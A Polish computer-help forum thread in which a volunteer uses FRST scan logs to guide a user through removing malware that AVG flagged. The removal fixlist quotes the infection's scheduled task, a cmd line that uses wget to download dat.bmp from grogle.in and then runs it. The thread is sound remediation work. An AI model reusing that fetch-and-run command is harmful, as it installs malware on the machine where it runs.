karollaa
(Karola119)
23 Styczeń 2015 15:39
#1
W dniu dzisiejszym mój antywirus zaczął mi w kółko pokazywać komunikat, że mam wirusa w pliku msjfghle.exe w związku z tym zwracam się do dobrych dusz o pomoc w jego usunięciu bo “standardowe metody” niedziałają. Mój antywirus to AVG. Poniżej wklejam linki do skryptów z OTL
file:///C:/Users/misie/Downloads/Extras.Txt
file:///C:/Users/misie/Downloads/OTL.Txt
Atis
(Atis)
23 Styczeń 2015 15:44
#2
karollaa
(Karola119)
23 Styczeń 2015 15:58
#3
Dziękuję za szybko odpowiedz. Wklejam poniżej linki :
file:///C:/Users/misie/Downloads/Shortcut.txt
file:///C:/Users/misie/Downloads/Addition.txt
file:///C:/Users/misie/Downloads/FRST.txt
Atis
(Atis)
23 Styczeń 2015 15:59
#4
Pliki są na Twoim dysku, więc nikt nie ma do tego dostępu.
Skopiuj z notatnika i wklej na stronie http://wklej.org/ , a do posta wklej link do wklejki.
karollaa
(Karola119)
23 Styczeń 2015 16:03
#5
Atis
(Atis)
23 Styczeń 2015 16:15
#6
Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist :
CloseProcesses:
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-2978387610-2300107763-1866996582-1002\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-2978387610-2300107763-1866996582-1002\...\Policies\Explorer: [HideSCAHealth] 0
msjfghle.exeToolbar: HKU\S-1-5-21-2978387610-2300107763-1866996582-1001 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-2978387610-2300107763-1866996582-1002 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
2014-12-30 10:30 - 2014-12-30 10:30 - 00000000 __SHD () C:\found.005
C:\ProgramData\*.exe
C:\ProgramData\dat.bmp
C:\ProgramData\DP45977C.lfl
Task: {0A467639-55EE-401E-8028-8EF9B0C8FD09} - System32\Tasks\Open Chrome => Chrome.exe --new-window http://toolbar.avg.com/almost-done?pid=safeguard&lang=pl
Task: {2FD5F999-B824-4F28-908B-CFC686067555} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=kxroWYCECz;setup.exe;1421942994 & start cmd /R dat.bmp <==== ATTENTION
Task: {C6AE68B3-E6D9-4847-992C-0EB7D49DD539} - System32\Tasks\{BE77601A-B116-4E82-885E-264644F35E67} => Chrome.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=4.2.11.155&LastError=404
AlternateDataStreams: C:\Users\misie\AppData\Local\desktop.ini:07a19238af92db80fe9045ca73c7a84e
EmptyTemp:
Uruchom FRST i kliknij Fix. Pokaż raport z usuwania Fixlog.
Kliknij Scan i pokaż nowy raport z FRST bez Addition i Shortcut.
karollaa
(Karola119)
23 Styczeń 2015 16:40
#7
Atis
(Atis)
23 Styczeń 2015 17:07
#8
Skasuj folder C:\FRST
Usuń stare punkty przywracania: Przywracanie systemu i kopie w tle
Dysk przeskanuj Malwarebytes Anti-Malware
Podczas instalacji usuń zaznaczenie przy Uruchom okres testowy Malwarebytes Anti-Malware Premium.
http://wstaw.org/m/2014/03/25/2014-03-25_123039.png
Język PL > Settings > General Settings > Language > Polish
Odinstaluj:
Adobe Flash Player 16 NPAPI
Adobe Reader XI
Java 7 Update 13
Java 7 Update 13
Zainstaluj:
Flash Player 16.0.0.287 Plugin
Adobe Reader XI 11.0.10
Java 8 Update 31
karollaa
(Karola119)
23 Styczeń 2015 21:27
#9
Zrobiłam wszystko tak jak mi poradziłeś i na koniec na wszelki wypadek jeszcze raz zeskanowałam komputer i ten program wykryl mi jakies dwa pliki zainfekowane ale inne niz wczesniej AVG, usunełam i z głowy.
Bardzo dziękuje